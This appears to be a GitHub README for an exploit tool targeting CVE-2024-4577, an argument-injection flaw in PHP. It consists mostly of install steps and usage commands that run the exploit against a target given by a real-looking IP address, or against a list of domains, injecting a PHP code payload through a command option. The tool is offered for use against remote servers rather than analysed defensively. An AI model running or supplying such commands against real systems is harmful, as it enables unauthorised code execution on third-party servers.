Skip to content

Latest commit

 

History

History
28 lines (13 loc) · 389 Bytes

README.md

File metadata and controls

28 lines (13 loc) · 389 Bytes

CVE-2024-4577

Argument injection vulnerability in PHP

INSTALL

git clone https://github.com/gotr00t0day/CVE-2024-4577.git

cd CVE-2024-4577

pip3 install -r requirements.txt

USAGE

# Scan A Target

python3 CVE-2024-4577.py -t https://160.153.61.66/ -c "<?phpphpinfo();?>"

# Scan a list of Targets

python3 CVE-2024-4577.py -f domains.txt -c  "<?phpphpinfo();?>"